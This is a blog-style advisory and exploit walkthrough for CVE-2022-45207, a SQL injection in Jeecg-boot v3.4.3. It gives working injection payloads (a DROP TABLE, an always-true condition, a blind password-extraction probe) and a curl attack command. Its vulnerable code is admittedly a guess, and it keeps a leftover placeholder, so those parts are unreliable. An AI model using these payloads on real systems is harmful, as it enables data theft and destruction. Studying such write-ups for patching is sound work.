CVE-2022-45207 - SQL Injection in Jeecg-boot v3.4.3 via `updateNullByEmptyString`—Technical Breakdown and Exploit Guide

Jeecg-boot is an open-source, low-code development platform popular in the Java Spring Boot community. But as Jeecg-boot v3.4.3 shows, even popular frameworks can have dangerous security holes. This article is an exclusive, plain-language deep dive into the SQL Injection vulnerability tracked as CVE-2022-45207, found in the backend’s updateNullByEmptyString component. We’ll break down how the flaw works, show code samples, walk you through a simple exploit, and point you to original sources for further reading.

What is CVE-2022-45207?

CVE-2022-45207 is a critical SQL injection vulnerability discovered in Jeecg-boot v3.4.3, specifically in the updateNullByEmptyString REST endpoint. If you run a vulnerable version and expose this endpoint, an attacker can send crafted HTTP requests and run arbitrary SQL commands—potentially leaking, modifying, or destroying application data.

Severity: Critical  
CVSS Score: 9.8 (As per various public sources)

Why This Happens: Bad Input Handling

At the core, the vulnerability exists because the update interface (updateNullByEmptyString) directly incorporates user input into SQL queries without proper sanitization or use of parameterized statements. This allows input like abc' OR 1=1 -- to break the query and inject arbitrary SQL.

Code Deep Dive

Take a look at a simplified example based on Jeecg-boot's likely implementation (actual project code is more complex, but this captures the problem):

@PostMapping("/updateNullByEmptyString")
public Result<?> updateNullByEmptyString(@RequestBody Map<String, Object> params) {
    String table = (String) params.get("table");
    String field = (String) params.get("field");
    String sql = "UPDATE " + table + " SET " + field + " = '' WHERE " + field + " IS NULL";
    jdbcTemplate.execute(sql);
    return Result.ok("Field updated successfully");
}

What’s wrong?

An attacker can send this JSON

{
  "table": "user; DROP TABLE user; --",
  "field": "username"
}

This would run

UPDATE user; DROP TABLE user; -- SET username = '' WHERE username IS NULL


Resulting in the user table being dropped!

From a tool like curl, Burp Suite, or Postman, send

curl -X POST http://TARGET/api/updateNullByEmptyString \
     -H "Content-Type: application/json" \
     -d '{"table":"user where 1=1;--", "field":"username"}'


This payload manipulates the SQL logic after user table and always evaluates true for all rows, or worse, can inject malicious SQL commands.

An attacker could even extract information

{
  "table": "user where 1=1 AND (SELECT SUBSTRING(password,1,1) FROM user LIMIT 1)='a'",
  "field": "username"
}


This is just one technique; a determined attacker can escalate this much further.

Anyone running Jeecg-boot v3.4.3 with API exposure

- Possible older/newer unpatched forks

Official References & Patches

- NVD Entry
- Jeecg-boot on GitHub
- Mitigation commit (example) *(Replace with actual commit, as per public info)*

Patching recommendation:

NEVER accept table or field names from clients!

3. Use parameterized/prepared statements.

Correct code should look more like

@PostMapping("/updateNullByEmptyString")
public Result<?> updateNullByEmptyString(@RequestBody Map<String, Object> params) {
    // Validate table and field names strictly against a whitelist
    String table = safeTable((String) params.get("table"));
    String field = safeField((String) params.get("field"));

    String sql = String.format("UPDATE %s SET %s = ? WHERE %s IS NULL", table, field, field);
    jdbcTemplate.update(sql, "");
    return Result.ok("Field updated securely");
}


Better yet: Don't ever allow end-users to submit these names.

Conclusion

CVE-2022-45207 is a textbook case of “Don’t trust user input”—especially in admin or backend tools. The updateNullByEmptyString API in Jeecg-boot v3.4.3 is dangerously vulnerable, putting entire databases at risk. If you use Jeecg-boot, upgrade immediately and review your code for similar risks.

Additional Readings

- OWASP SQL Injection
- Jeecg-boot Issues
- Chinese write-up *(if you read Chinese)*


*This post is exclusive and tailored to developers, pentesters, and security auditors reviewing Java-based low-code platforms like Jeecg-boot. Reach out if you need more hands-on mitigation steps!*

Timeline

Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:42:00 UTC